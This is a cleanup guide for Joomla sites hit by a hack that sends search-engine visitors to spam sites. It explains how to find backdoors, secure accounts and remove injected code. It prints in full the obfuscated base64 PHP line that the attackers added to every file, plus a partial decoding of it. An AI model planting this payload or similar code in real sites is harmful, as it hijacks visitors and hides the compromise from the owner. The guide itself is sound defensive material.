If you have a Joomla! website and your visitors complain about being redirected to suspicious websites when trying to reach you, you should first try to do what they are doing: searching for your website on Google. Chances are that you will find it, but clicking on it will direct you to another website, usually looking like spam or badware website.
Once the problem has been confirmed, inspect your PHP files and you may notice that a line of code has been injected into each of them, right after the first
<?php.This line looks like the following:
- eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9scGlzdHcuNHB1LmNvbS8iKTsKZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));
Which decodes to:
- if (!$qazplm){
- $referer=$_SERVER['HTTP_REFERER'];
- $uag=$_SERVER['HTTP_USER_AGENT'];
- if ($uag) {
- if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
- }
- }
- }
- }
- }
Understanding this code explains why this hack is hard to uncover: it is altering the contents served to your visitors only on the following conditions:
- The visitor is not using Microsoft Internet Explorer ;
- and the visitor followed a result link from a major search engine.
It is even possible that you are affected with such a hack for a long time and you just realize it now, because you were not satisfying one of those conditions previously, most probably because you were visiting your own website by typing its URL in your browser (or followed one of your bookmarks).
At this point, you need to realize that to modify your site so deep, the hacker initially succeeded in uploading a backdoor to your server. It would have allowed him to alter all your PHP files. Typically, he guessed your administrator password, exploited the account to upload a malicious PHP script, and then used it to alter all your files. You will probably find PHP files in your public files folders. In two cases that we observed, there was in the folder
imagesa 69 bytes file calledpost.phpwith the following contents:Although this kind of files look trivial, it allows arbitrary code execution on your server by anyone, and should be removed immediately. We'd like to remind everybody that you should never see PHP files in
images,media,tmp,cacheandadministrator/cachefolders and subfolders of Joomla! websites.Before undertaking cleaning the rest of the website, you should to take some safety measures to make sure that hacker will not come back. The first one is to change all your passwords, since we already explained that the he probably compromised the administrator account. A safer measure is to create another super administrator account with an uncommon name, like pablo1234, and to disable the default administrator account. While at it, double-check that no other administrator, or even regular user, suspicious account have been created.
The second one is to check the server logs to eventually discover other backdoors in other locations. Typically, multiple
POSTrequests at the time the infection appeared are suspicious. Systematically inspect the requested files and be especially aware of the combination ofeval()and$_POST. You may also consider contacting your hosting provider for support: some of them have tools which automatically scan your account and may help you to detect potential threats in your files.Thirdly and lastly, if you have to do it yourself, cleaning the hack can be seen as both difficult and easy.
Difficult, because all your PHP files may have the line of malicious code injected, and since we are talking about a Joomla! website, this represents a lot of files that you don't want to clean manually.
Easy, because the hacker injected exactly the same line of code in each file, meaning that you can easily write a script to find it in all your files, and clean them all at once.
If you have a fresh and safe backup, and losing the latest data is acceptable to you, restoring it is also a good idea.After that, you should have got rid of this hack. There's one last thing to do if Google has flagged your website for malware : you'll have to submit a reconsideration request via your Google Webmaster Tools account. It may take a few days, but keep faith and you will eventually get back into their index. And of course, don't forget to backup your website often, and upgrade your Joomla! website and its extensions regularly.